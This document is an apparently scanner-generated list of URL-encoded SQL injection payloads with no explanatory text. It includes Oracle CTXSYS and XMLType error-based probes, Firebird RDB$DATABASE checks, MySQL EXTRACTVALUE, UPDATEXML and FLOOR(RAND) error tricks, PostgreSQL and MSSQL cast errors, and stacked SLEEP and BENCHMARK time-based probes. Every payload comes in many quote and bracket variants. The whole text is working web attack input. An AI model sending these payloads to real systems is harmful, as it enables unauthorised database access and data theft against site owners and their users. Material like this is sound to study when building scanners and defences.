-8599%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -6151%27%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27mIaL%27%3D%27mIaL -3483%27%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27MVbv%27%3D%27MVbv -1878%27%29%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27AxEK%27%3D%27AxEK -7609%27%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%27LoQI%27%3D%27LoQI -4394%27%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27kFMa%27%20LIKE%20%27kFMa -9801%27%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27UoLc%27%20LIKE%20%27UoLc -3500%27%29%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27RUdC%27%20LIKE%20%27RUdC -4319%27%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%27xtvg%27%20LIKE%20%27xtvg -2969%22%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22qQCY%22%3D%22qQCY -9944%22%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22krZs%22%3D%22krZs -8515%22%29%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22BCXy%22%3D%22BCXy -6526%22%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%22rlJX%22%3D%22rlJX -6972%22%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22neLi%22%20LIKE%20%22neLi -8586%22%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22gsgF%22%20LIKE%20%22gsgF -2266%22%29%29%29%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22mNgN%22%20LIKE%20%22mNgN -5895%22%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%22rAbW%22%20LIKE%20%22rAbW -1780%29%20WHERE%206027%3D6027%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -4957%27%29%20WHERE%205252%3D5252%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -7215%27%20WHERE%202325%3D2325%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -1839%22%20WHERE%205171%3D5171%20OR%209679%3DCTXSYS.DRITHSX.SN%289679%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289679%3D9679%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 -1730%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -4001%27%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -6867%27%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -4436%22%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -2536%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%281266%3D1266 -6974%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%281996%3D1996 -9758%29%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%289507%3D9507 -6778%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -8724%27%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%27Ycun%27%3D%27Ycun -8256%27%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%27GUKy%27%3D%27GUKy -5396%27%29%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%27ILCo%27%3D%27ILCo -4347%27%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%27LkLn%27%3D%27LkLn -7648%27%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%27xVEL%27%20LIKE%20%27xVEL -5522%27%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%27Ujgm%27%20LIKE%20%27Ujgm -9511%27%29%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%27ndQy%27%20LIKE%20%27ndQy -9348%27%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%27saKC%27%20LIKE%20%27saKC -2238%22%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%22Fbnc%22%3D%22Fbnc -6454%22%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%22GOCJ%22%3D%22GOCJ -8689%22%29%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%22zifM%22%3D%22zifM -4035%22%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%22qJYU%22%3D%22qJYU -2844%22%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%22wVBQ%22%20LIKE%20%22wVBQ -8672%22%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%22UOIX%22%20LIKE%20%22UOIX -3562%22%29%29%29%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%28%28%28%22AGVu%22%20LIKE%20%22AGVu -6913%22%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%20AND%20%22VbEP%22%20LIKE%20%22VbEP -8473%29%20WHERE%205881%3D5881%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -6547%27%29%20WHERE%208302%3D8302%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -7035%27%20WHERE%209129%3D9129%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 -1765%22%20WHERE%207815%3D7815%20OR%209248%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%209248%20WHEN%209248%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29 %28SELECT%205420%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285420%3D5420%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 %28EXTRACTVALUE%288422%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%288422%3D8422%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29%29 %28UPDATEXML%281215%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%281215%3D1215%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C4025%29%29 %28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289184%3D9184%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285395%3D5395%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282588%3D2588%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%204194%3D%28%27%3Avvi%3A%27%7C%7C%28SELECT%20CASE%204194%20WHEN%204194%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Atqw%3A%27%29%29 foo%2C%28SELECT%203488%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%283488%3D3488%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%2CEXTRACTVALUE%288571%2CCONCAT%280x5c%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%288571%3D8571%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%29 foo%2CUPDATEXML%288652%2CCONCAT%280x2e%2C0x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%288652%3D8652%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%29%2C2770%29 foo%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281861%3D1861%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 foo%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288567%3D8567%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%29 foo%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288772%3D8772%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 foo%29%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%29%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%3B%20SELECT%20SLEEP%285%29%3B%23 foo%22%3B%20SELECT%20SLEEP%285%29%3B%23 foo%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%288564%3D8564 foo%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%287527%3D7527 foo%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%285074%3D5074 foo%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27gYjZ%27%3D%27gYjZ foo%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27jAcZ%27%3D%27jAcZ foo%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27fmRh%27%3D%27fmRh foo%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27Pngc%27%3D%27Pngc foo%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27CImE%27%20LIKE%20%27CImE foo%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27crtY%27%20LIKE%20%27crtY foo%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27zFsZ%27%20LIKE%20%27zFsZ foo%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27ufUh%27%20LIKE%20%27ufUh foo%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22FAKc%22%3D%22FAKc foo%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22smfz%22%3D%22smfz foo%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22bLaR%22%3D%22bLaR foo%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22ehOu%22%3D%22ehOu foo%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22BFVt%22%20LIKE%20%22BFVt foo%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22WPde%22%20LIKE%20%22WPde foo%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22GANd%22%20LIKE%20%22GANd foo%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22AUMf%22%20LIKE%20%22AUMf foo%29%20WHERE%209894%3D9894%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%29%20WHERE%208587%3D8587%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%20WHERE%207164%3D7164%3B%20SELECT%20SLEEP%285%29%3B%23 foo%22%20WHERE%204927%3D4927%3B%20SELECT%20SLEEP%285%29%3B%23 foo%27%20%7C%7C%20%28SELECT%204990%20FROM%20DUAL%20WHERE%204061%3D4061%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203265%20WHERE%204533%3D4533%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205294%20FROM%20DUAL%20WHERE%203631%3D3631%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 foo%20%2B%20%28SELECT%208928%20WHERE%209001%3D9001%3B%20SELECT%20SLEEP%285%29%3B%23%20%29 foo%27%20%2B%20%28SELECT%20%27NspK%27%20FROM%20DUAL%20WHERE%201544%3D1544%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27qtDd%27%20WHERE%207755%3D7755%3B%20SELECT%20SLEEP%285%29%3B%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20SLEEP%285%29%3B%23%20%23 foo%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%22%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%282279%3D2279 foo%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%284966%3D4966 foo%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%281200%3D1200 foo%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23 foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%27MOuz%27%3D%27MOuz foo%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%27earZ%27%3D%27earZ foo%27%29%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%28%27HRim%27%3D%27HRim foo%27%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%27LqTT%27%3D%27LqTT foo%27%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%27mdjM%27%20LIKE%20%27mdjM foo%27%29%29%3B%20SELECT%20BENCHMARK%285000000%2CMD5%280x41506574%29%29%3B%23%20AND%20%28%28%27eNqt%27%20LIKE%20%27eNqt 